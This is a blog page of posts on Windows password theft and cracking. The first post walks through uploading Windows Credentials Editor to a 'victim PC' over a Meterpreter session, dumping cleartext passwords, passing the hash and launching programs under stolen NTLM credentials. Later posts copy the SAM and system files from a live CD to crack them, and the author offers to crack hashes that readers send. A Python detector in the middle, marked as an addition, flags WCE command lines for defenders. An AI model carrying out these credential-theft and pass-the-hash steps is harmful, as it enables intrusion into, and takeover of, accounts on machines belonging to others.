Showing posts with label windows7 password crack. Show all posts

How to get windows passwords in plain text?


Windows Credentials Editor (WCE) is a security tool that lists Windows logon sessions and lets you add, change, list and delete the associated credentials (e.g. LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' Kerberos tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After hacking a remote computer, upload WCE to the victim computer using Metasploit.
(1) Type the following command in the meterpreter session:
upload /pentest/passwords/wce/wce.exe .
(2) Now type shell to get a cmd prompt on the victim PC.
(3) Type wce.exe -w to get the passwords in clear text.


List NTLM credentials in memory?


By default, WCE lists the NTLM credentials in memory; there is no need to specify any options.
For example:
C:\Users\test>wce.exe

How to Change my current NTLM credentials?


wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!



How to Create a new logon session and launch a program with new NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe


How to generate NTLM hashes with WCE? 

wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how it works, download the PDF files below.
(1) PDF 1
(2) PDF 2

If you only need the cleartext passwords, and not the logon sessions or anything else,
you can use mimikatz to get them.
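
For defenders, the command lines shown above are themselves a detection signal. The following added example (not part of the original post and not WCE's own code) scans process-creation command lines, such as those recorded by Windows event 4688 with command-line auditing or by Sysmon event 1, for the -s <username>:<domain>:<lmhash>:<nthash> argument shape and for wce.exe -w. The function names, rule names and sample events are assumptions made up for the illustration.

```python
import re

# Argument shape WCE's -s option takes on this page: <username>:<domain>:<lmhash>:<nthash>.
# Matching the shape, not the file name, still fires when the binary has been renamed.
HASH_ARG = re.compile(
    r"(?<!\S)([^\s:]+):([^\s:]+):[0-9A-Fa-f]{32}:[0-9A-Fa-f]{32}(?!\S)")


def split_image(cmdline):
    """Return (lower-cased executable base name, argument list) of a command line."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))\s*(.*)$', cmdline)
    if not m:
        return "", []
    image = m.group(1) or m.group(2) or ""
    return re.split(r"[\\/]", image)[-1].lower(), m.group(3).split()


def scan(events):
    """Return (host, rule, detail) alerts for (host, command_line) events."""
    alerts = []
    for host, cmdline in events:
        image, args = split_image(cmdline)
        hit = HASH_ARG.search(cmdline)
        if hit:
            # Name the account only; the hash itself is never copied into the alert.
            account = f"{hit.group(2)}\\{hit.group(1)}"
            alerts.append((host, "ntlm_hash_on_command_line", account))
        if image in ("wce", "wce.exe"):
            if "-w" in args:
                alerts.append((host, "wce_cleartext_dump", image))
            elif not hit:
                # Keep only the first switch: -g is followed by a cleartext password.
                alerts.append((host, "wce_execution", " ".join(args[:1])))
    return alerts


# Constructed sample events (not from the page); the hash fields are filler hex.
LM, NT = "A1" * 16, "B2" * 16
SAMPLE_EVENTS = [
    ("WS01", r"C:\Users\test\wce.exe -w"),
    ("WS02", rf"C:\Users\test\svchelper.exe -s testuser:amplialabs:{LM}:{NT} -c cmd.exe"),
    ("WS03", r'"C:\Program Files\Tools\WCE.EXE" -g mypassword'),
    ("WS04", r"cmd.exe /c dir C:\tools\wce"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The second sample event shows why the hash-argument rule matters: it fires on a renamed binary, where a rule keyed only on the file name wce.exe would stay silent.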


How to Recover Windows 7 password in ubuntu?


(1) First boot Ubuntu from a live CD.

(2) Open Ubuntu Software Center, search for chntpw and install the package. If you do not have an internet connection on the PC with the lost password, download it from here.

(3) Now open a terminal and type the following command:
 cd /media/"drive name of Windows 7 partition"/Windows/System32/config
Use the drive name of the partition on which Windows 7 is installed, without the quotes.

(4) Now type sudo chntpw SAM and press ENTER. Then press 1 and restart the PC.


        

How To Recover Windows 7 password?


Here is a tutorial on how to recover a forgotten password on XP, Vista or Windows 7.

(1) First you have to boot from another OS such as Ubuntu, BackTrack or any other that comes in live CD format. Run the OS from the CD. (You can also run the OS from a pendrive; it's faster than a CD.)

(2) Copy the "sam" & "system" files from C:/WINDOWS/SYSTEM32/CONFIG (these files contain your password in NTLM hash form) and save them to your pendrive.

(3) Now we want to get the hashes from these files. There are different types of software available depending on the OS. For Windows I recommend "SAMInside". It's easy to use. Download from here.

(4) Now you need another computer to run it, because it is a Windows-compatible program, so copy the "sam" & "system" files and this program to the pendrive.

(5) Now open the pendrive on your friend's computer that has Windows. Unzip SAMInside and run the program.

(6) Now import the sam & system files into this software. It will show you the usernames and passwords in hash form.

(7) The next step is to crack the hashes. For this purpose you can use tools or an online hash cracker. Here is the list of online hash crackers (please view NTLM hash cracker). If you cannot crack them online you should use tools like John the Ripper, Cain & Abel, etc.

But if you cannot do that, the easy way is to download the Ophcrack ISO file from here. Burn it to a CD and reboot the PC. It will do it automatically for you.

If you still cannot do this, send me the sam & system files and I will give you the password. :)